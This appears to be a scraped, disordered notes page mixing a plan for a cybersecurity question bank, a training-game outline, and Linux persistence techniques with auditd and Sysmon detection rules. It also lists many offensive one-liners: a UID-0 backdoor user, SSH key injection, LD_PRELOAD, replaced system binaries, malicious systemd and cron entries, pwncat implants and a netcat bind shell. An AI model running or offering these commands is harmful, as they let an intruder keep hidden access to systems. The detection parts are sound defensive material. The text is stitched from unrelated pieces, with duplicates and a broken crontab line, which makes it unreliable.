TAGS: tr1p
Step 1.1: Add "HOW" and "HOW-TO" Information (Optional but Recommended)
Step 1.2: Create a "Description" Column (Recommended)
Step 2.1: Define Question Types
Step 2.2: Generate Questions (One Question Per Item Initially)
Step 2.3: Build a New CSV (Question Bank)
Item
: Copy from the original CSV.Question
: The question generated in Step 2.2.Answer
: The correct answer to the question.QuestionType
: The type of question (Definition, Relationship, etc.).Step 2.4: Validation
Step 3.1: Add Multiple Questions per Item
Step 3.2: Add Negative Examples (Optional)
A CSV file acting as a comprehensive question-answer dataset suitable for testing knowledge of cybersecurity documentation challenges and the proposed toolkit.
This plan ensures a step-by-step process to create a rich and detailed question-answer dataset. Level 1 Branches:
Level 2 Branches (Examples):
Connections between branches:
1.1. Keeping documentation up-to-date
Smart Documentation Toolkit 2.1. AI-powered narrative linking
Implementation in Google Workspace 3.1. Google Drive integration
Cyber Siege Game 4.1. Realistic attack simulation 4.2. Threat hunting training 4.3. APT28 focus 4.4. Integration of Atomic Red Team, benign logs, game theory
Kroki.io Diagram Integration 5.1. Decoding and interpreting diagrams
Question Building for Cyber Range 6.1. Defining learning objectives
Connections:
"Cybersecurity Documentation Challenges" is directly addressed by "Smart Documentation Toolkit" "Smart Documentation Toolkit" is implemented through "Implementation in Google Workspace" "Cyber Siege Game" utilizes elements from "Smart Documentation Toolkit" and "Kroki.io Diagram Integration" "Question Building for Cyber Range" informs the development of scenarios in "Cyber Siege Game"
=====
to do this thing
to do that thing
>
> outline_summarized
* data1-markmap
data2-markmap2:
[]data({'info':'rocks'})table?
Connections between branches:
From "Cybersecurity Documentation Challenges" to "Smart Documentation Toolkit":
From "Smart Documentation Toolkit" to "Implementation in Google Workspace":
From "Cyber Siege Game" to "Smart Documentation Toolkit" and "Kroki.io Diagram Integration":
From "Question Building for Cyber Range" to "Cyber Siege Game":
Unix shell configuration files are critical for setting up user environments and can be a target for persistence mechanisms. These files are executed at various points during the login and shell invocation processes, making them prime targets for adversaries seeking to maintain persistence on a system.
/etc/update-motd.d/: Scripts that generate the message of the day (motd).
/etc/init.d/: Contains scripts used by the init system to start and stop services.
/etc/rc.local: Executed at the end of each multi-user runlevel.
(8) 3.1. Shell initialization files
(7) Track any file changes using auditd - Server Fault
(6) Create an audit watch for command history : r/linuxadmin - Reddit
(5) Monitoring Linux File Access With auditd - Baeldung
(4) How to monitor permission, ownership or any other change to a ...
(3) 3.1. The .bash_profile, .bash_logout, and .bashrc Files
(2) What is the difference between /etc/profile and .bashrc - Ask Ubuntu
(1) Configuring the Shell
Setting up and using auditd for monitoring file changes 4 5 6 7.
Detailed information on .bash_profile, .bash_logout, and .bashrc files 3.
Differences between /etc/profile and .bashrc 2.
Effective shell configuration practices 1.
Overview
-w /etc/profile.d/ -p wa -k shell_profiles
-w /etc/profile -p wa -k shell_profiles
-w /etc/shells -p wa -k shell_profiles
-w /etc/bashrc -p wa -k shell_profiles
-w /etc/csh.cshrc -p wa -k shell_profiles
-w /etc/csh.login -p wa -k shell_profiles
-w /etc/fish/ -p wa -k shell_profiles
-w /etc/zsh/ -p wa -k shell_profiles
-w /etc/bash.bashrc -p wa -k shell_profiles
-w /etc/bash.bash_logout -p wa -k shell_profiles
-w /root/.bashrc -p wa -k shell_profiles
-w /root/.bash_logout -p wa -k shell_profiles
-w /root/.profile -p wa -k shell_profiles
-w /root/.bash_profile -p wa -k shell_profiles
-w /root/.bash_login -p wa -k shell_profiles
File Description
/etc/profile Systemwide files executed at the start of login shells
/etc/profile.d/ All .sh files are executed at the start of login shells
/etc/bash.bashrc Systemwide files executed at the start of interactive shells
/etc/bash.bash_logout Systemwide executed as a login shell exits
~/.bashrc User-specific startup script executed at the start of interactive shells
~/.bash_profile, ~/.bash_login, ~/.profile User-specific startup script, but only the first file found is executed
~/.bash_logout User-specific clean up script at the end of the session
-w /etc/systemd/system-generators/ -p wa -k systemd_generator
-w /usr/local/lib/systemd/system-generators/ -p wa -k systemd_generator
-w /lib/systemd/system-generators/ -p wa -k systemd_generator
-w /usr/lib/systemd/system-generators -p wa -k systemd_generator
-w /etc/systemd/user-generators/ -p wa -k systemd_generator
-w /usr/local/lib/systemd/user-generators/ -p wa -k systemd_generator
-w /usr/lib/systemd/user-generators/ -p wa -k systemd_generator
Detection Methods
Key Files and Directories
Overview
Python Examples
(local) pwncat$ run implant.authorized_key key=./id_rsa
~/.bash_logout: This file is executed when a login shell exits and can be used for cleanup tasks.
~/.bash_profile, ~/.bash_login, ~/.profile: These files are executed for login shells, but only the first one found is executed. They are used to set up the user's environment.
~/.bashrc: This file is executed for interactive non-login shells and is used to configure the user's shell environment.
/etc/profile: This file is executed for login shells and sets up environment variables and other settings for all users.
Key Shell Configuration Files
Linux Persistence Technique: T1546.004 - Unix Shell Configuration Modification
Shell/profile configurations
Event Triggered Execution: Unix Shell Configuration Modification
useradd -m malicious_user
echo "malicious_user:password" | chpasswd
echo -e "[Unit]\nDescription=Malicious Service\n\n[Service]\nExecStart=/path/to/malicious/script.sh\n\n[Install]\nWantedBy=multi-user.target" > /etc/systemd/system/malicious.service
systemctl enable malicious.service
chmod +s /path/to/script.sh
mv /bin/ls /bin/ls.bak
cp /path/to/malicious/ls /bin/ls
// Example code using alternate system calls
echo "ssh-rsa AAAAB3... malicious_key" >> ~/.ssh/authorized_keys
useradd -ou 0 -g 0 malicious_user
auditctl -w /etc/rc.local -p wa -k rclocal
trap '/path/to/malicious/script.sh' SIGINT SIGTERM EXIT
sudo bpftrace -e 'tracepoint:syscalls:sys_enter_execve { printf("%d %s\n", pid, comm); }'
echo "/path/to/malicious/script.sh" >> /etc/rc.local
echo "*/5 * * * * /path/to/malicious/script.sh" >> /etc/crontab
// Example code modifying parameters
echo "/path/to/malicious.so" > /etc/ld.so.preload
echo "/path/to/malicious/script.sh" >> ~/.bashrc
echo -e "[Unit]\nDescription=Malicious Timer\n\n[Timer]\nOnBootSec=5min\nOnUnitActiveSec=1h\n\n[Install]\nWantedBy=timers.target" > /etc/systemd/system/malicious.timer
systemctl enable malicious.timer
echo "alias ls='ls; /path/to/malicious/script.sh'" >> ~/.bashrc
int fd = open("file.txt", O_RDWR);
echo "/path/to/malicious/script.sh" >> ~/.profile
#include <seccomp.h>
scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_ALLOW);
seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0);
seccomp_load(ctx);
import subprocess
def setup_auditd_rule():
rule = '-w /etc/rc.local -p wa -k rclocal'
try:
result = subprocess.run(['which', 'auditctl'], capture_output=True, text=True)
if result.returncode != 0:
print('auditd is not installed. Please install it to set up monitoring.')
return
result = subprocess.run(['sudo', 'auditctl', '-R', rule], capture_output=True, text=True)
if result.returncode == 0:
print('Successfully added auditd rule to monitor /etc/rc.local')
else:
print(f'Failed to add auditd rule. Error: {result.stderr}')
except Exception as e:
print(f'Error setting up auditd rule: {str(e)}')
setup_auditd_rule()
import subprocess
def check_rc_local_logs():
try:
result = subprocess.run(['tail', '-n', '100', '/var/log/syslog'], capture_output=True, text=True)
if result.returncode == 0:
print('Checking last 100 lines of syslog for rc-local related entries:')
rc_local_logs = [line for line in result.stdout.split('\n') if 'rc-local' in line.lower()]
if rc_local_logs:
for log in rc_local_logs:
print(log.strip())
else:
print('No rc-local related entries found in the last 100 lines of syslog')
else:
print('Unable to read syslog')
except Exception as e:
print(f'Error checking syslog: {str(e)}')
check_rc_local_logs()
import subprocess
def list_running_services():
try:
result = subprocess.run(['service', '--status-all'], capture_output=True, text=True)
if result.returncode == 0:
print('Running services (via service command):')
for line in result.stdout.split('\n'):
if '[ + ]' in line:
print(line.strip())
else:
result = subprocess.run(['ps', '-e'], capture_output=True, text=True)
if result.returncode == 0:
print('Running processes (may include services):')
for line in result.stdout.split('\n')[1:]:
print(line.strip())
else:
print('Unable to list running services or processes')
except Exception as e:
print(f'Error listing running services: {str(e)}')
list_running_services()
import subprocess
def check_rc_local_service():
try:
result = subprocess.run(['systemctl', 'list-unit-files', '--type=service', '--all'], capture_output=True, text=True)
output = result.stdout
for line in output.split('\n'):
if 'rc-local.service' in line and 'enabled' in line:
print('rc-local.service is enabled')
return
print('rc-local.service is not enabled')
except Exception as e:
print(f'Error checking rc-local.service: {str(e)}')
check_rc_local_service()
import os
def check_rc_local():
if os.path.isfile('/etc/rc.local'):
with open('/etc/rc.local', 'r') as file:
content = file.read()
print("Contents of /etc/rc.local:")
print(content)
else:
print("missing")
check_rc_local()
Monitor changes to systemd generator directories:
<FileCreate onmatch="include">
<Rule name="TechniqueID=T1037,TechniqueName=Boot or Logon Initialization Scripts: motd" groupRelation="or">
<TargetFilename condition="begin with">/etc/update-motd.d/</TargetFilename>
</Rule>
</FileCreate>
-w /etc/update-motd.d/ -p wa -k motd
-w /etc/init.d/ -p wa -k init
<FileCreate onmatch="include">
<Rule name="TechniqueID=T1037.004,TechniqueName=Boot or Logon Initialization Scripts: RC Scripts" groupRelation="or">
<TargetFilename condition="is">/etc/rc.local</TargetFilename>
</Rule>
</FileCreate>
-w /etc/rc.local -p wa -k rclocal
cat /var/log/syslog | grep 'rc-local'
systemctl list-units | grep 'running' | grep '.*.service'
systemctl list-unit-files --type=service --all | awk '$3 == "enabled" {print $1}' | grep 'rc-local.service'
[ -f /etc/rc.local ] && cat /etc/rc.local || echo "missing"
Linux Persistence Technique: T1037.004 - Boot or Logon Initialization Scripts
* Modify web server configuration to include a malicious script.
```bash
echo "Include /path/to/malicious.conf" >> /etc/apache2/apache2.conf
echo "export PATH=/path/to/malicious:$PATH" >> ~/.bash_profile
echo "malicious_code" >> /usr/bin/systemctl
echo "malicious_code" >> /bin/bash
insmod /path/to/malicious.ko
echo "Match User root\nForceCommand /path/to/malicious/script.sh" >> /etc/ssh/sshd_config
echo "DPkg::Post-Invoke {\"/path/to/malicious/script.sh\";};" >> /etc/apt/apt.conf.d/99-malicious
echo "/path/to/malicious/script.sh" >> ~/.profile
sed -i 's|ExecStart=.*|ExecStart=/path/to/malicious/script.sh|' /etc/systemd/system/existing.service
echo "malicious_code" >> /path/to/driver.c
(15) Excel: How to count unique items in a list - FM (14) Count unique values - Excel formula - Exceljet (13) 36 Smart Answers to “What Makes You Unique?” - Status.net (12) How to Count Unique Values Inside a List in Python? - Tutorialspoint (11) COUNT DISTINCT and COUNT UNIQUE functions - IBM (10) 10 Unique and Unexpected Job Interview Questions - LinkedIn (9) How do I count occurrence of unique values inside a list [duplicate] (8) Count unique values in a range with COUNTIF - Formulas - Exceljet (7) How to Answer “What Makes You Unique?” (With Samples) (6) How to count unique values inside a list - GeeksforGeeks (5) Count unique and distinct values in Excel with formula or pivot table (4) A List Of 33 Unique Interview Questions And Answers - Indeed (3) Count unique values among duplicates - Microsoft Support (2) Count Distinct ( Unique ) elements in an array - GeeksforGeeks (1) How to Answer 'What Makes You Unique?' & Stand Out in Your Next ... AppArmor Profile Library Hijacking SSH ForceCommand Syslog Configuration Auditd Rule Kernel Hook System Tap Script Environment Variables LD_LIBRARY_PATH XDG Autostart D-Bus Service Startup Applications Gnome Keyring SSH Key Injection Logrotate System Tap Network Interface Motd Sudoers File SSH Banner Apache Module Gnome Autostart Xinitrc Udev Rule Network Service At Job Init Script LD_PRELOAD Kernel Module SSH Configuration Bash Logout Profile.d Script Profile Modification Bashrc Modification RC Local Systemd Service Cron Job Backdoor User PAM Backdoor Module Authorized Key Implant (15) How to count number of unique items in an array - rust - Reddit (14) Get Unique Values From a List in Python - DigitalOcean (13) A Charming Algorithm for Count-Distinct - Justin Jaffray (12) Count Unique Values in Python List - Studytonight (11) Notation for number of distinct elements in a set (10) How to Count Unique Values Inside a List in Python? - Tutorialspoint (9) Counting Distinct Values in set of data for a group - Grist Creators (8) CountDistinct - Wolfram Language Documentation (7) Counting number of unique values in a Python list - GeeksforGeeks (6) Count unique values among duplicates - Microsoft Support (5) pandas: Get unique values and their counts in a column - nkmk note (4) How to count unique values inside a list - GeeksforGeeks (3) Count Distinct ( Unique ) elements in an array - GeeksforGeeks (2) Excel: How to count unique items in a list - FM (1) How do I count occurrence of unique values inside a list [duplicate]
function countUniqueElements(list): unique_counts = {} for item in list: if item in unique_counts: unique_counts[item] += 1 else: unique_counts[item] = 1 return unique_counts
input_list = [1, 2, 2, 5, 8, 4, 4, 8] unique_counts = countUniqueElements(input_list) unique_elements = keys(unique_counts) counts = values(unique_counts)
print("Unique elements:", unique_elements) print("Counts:", counts)
Count Unique Values:```text
=COUNTA(UNIQUE(A1:A10))
Extract Unique Values:```text =UNIQUE(A1:A10)
import numpy as np
input_list = [1, 2, 2, 5, 8, 4, 4, 8] unique_elements, counts = np.unique(input_list, return_counts=True)
print("Unique elements:", unique_elements) print("Counts:", counts)
input_list = [1, 2, 2, 5, 8, 4, 4, 8] unique_counts = {}
for item in input_list: if item in unique_counts: unique_counts[item] += 1 else: unique_counts[item] = 1
unique_elements = list(unique_counts.keys()) counts = list(unique_counts.values())
print("Unique elements:", unique_elements) print("Counts:", counts)
from collections import Counter
input_list = [1, 2, 2, 5, 8, 4, 4, 8] counter = Counter(input_list) unique_elements = list(counter.keys()) counts = list(counter.values())
print("Unique elements:", unique_elements) print("Counts:", counts)
User
cp /path/to/malicious.so /usr/lib/libc.so.6
echo "ForceCommand /path/to/malicious/script.sh" >> /etc/ssh/sshd_config systemctl restart sshd
echo ". /path/to/malicious/script.sh" >> /etc/syslog.conf
echo "-a always,exit -F arch=b64 -S execve -F key=malicious" >> /etc/audit/rules.d/audit.rules
echo 'int malicious_hook(void) { system("/path/to/malicious/script.sh"); return 0; }' > /usr/src/linux/kernel/malicious_hook.c
echo 'probe begin { exec("/path/to/malicious/script.sh") }' > /usr/share/systemtap/tapset/malicious.stp
echo "export PATH=/path/to/malicious:$PATH" >> /etc/profile
echo "export LD_LIBRARY_PATH=/path/to/malicious/lib" >> /etc/profile
echo -e "[Desktop Entry]\nType=Application\nExec=/path/to/malicious/script.sh\nHidden=false\nNoDisplay=false\nX-GNOME-Autostart-enabled=true\nName=Malicious" > /etc/xdg/autostart/malicious.desktop
echo -e "[D-BUS Service]\nName=org.malicious.service\nExec=/path/to/malicious/script.sh" > /usr/share/dbus-1/services/org.malicious.service
echo "/path/to/malicious/script.sh" >> ~/.config/autostart/malicious.desktop
echo "/path/to/malicious/script.sh" >> ~/.gnome2/keyrings/login.keyring
echo "ssh-rsa AAAAB3... malicious_key" >> ~/.ssh/authorized_keys
echo "/path/to/malicious/script.sh" >> /etc/logrotate.d/syslog
stap -e 'probe begin { exec("/path/to/malicious/script.sh") }'
echo "up /path/to/malicious/script.sh" >> /etc/network/interfaces
echo "/path/to/malicious/script.sh" >> /etc/motd
echo "Cmnd_Alias MALICIOUS = /path/to/malicious/script.sh" >> /etc/sudoers
echo "/path/to/malicious/script.sh" >> /etc/issue.net
echo "LoadModule malicious_module /path/to/malicious.so" >> /etc/apache2/apache2.conf systemctl restart apache2
echo -e "[Desktop Entry]\nType=Application\nExec=/path/to/malicious/script.sh\nHidden=false\nNoDisplay=false\nX-GNOME-Autostart-enabled=true\nName=Malicious" > ~/.config/autostart/malicious.desktop
echo "/path/to/malicious/script.sh" >> ~/.xinitrc
echo 'ACTION=="add", RUN+="/path/to/malicious/script.sh"' > /etc/udev/rules.d/99-malicous.rules
nc -l -p 12345 -e /bin/bash &
echo "/path/to/malicious/script.sh" | at now + 1 minute
echo -e "#!/bin/sh\n/path/to/malicious/script.sh" > /etc/init.d/malicious chmod +x /etc/init.d/malicious update-rc.d malicious defaults
echo "export LD_PRELOAD=/path/to/malicious.so" >> /etc/profile
insmod /path/to/malicious.ko
echo "ForceCommand /path/to/malicious/script.sh" >> /etc/ssh/sshd_config systemctl restart sshd
echo "/path/to/malicious/script.sh" >> ~/.bash_logout
echo "/path/to/malicious/script.sh" > /etc/profile.d/malicious.sh
echo "/path/to/malicious/script.sh" >> /etc/profile
echo "/path/to/malicious/script.sh" >> ~/.bashrc
echo "/path/to/malicious/script.sh" >> /etc/rc.local
echo -e "[Unit]\nDescription=Malicious Service\n\n[Service]\nExecStart=/path/to/malicious/script.sh\n\n[Install]\nWantedBy=multi-user.target" > /etc/systemd/system/malicious.service systemctl enable malicious.service
echo "/5 * /path/to/malicious/script.sh" >> /etc/crontab
(local) pwncat$ run implant.passwd backdoor_user=pwncat backdoor_pass=pwncat
(local) pwncat$ run implant.pam password=s3cr3ts
Install an SSH authorized key to allow persistent access Persistence Implants Conclusion Explanation of Key Files Detect modifications of shell configs with auditd Linux-Persistence-T1546.004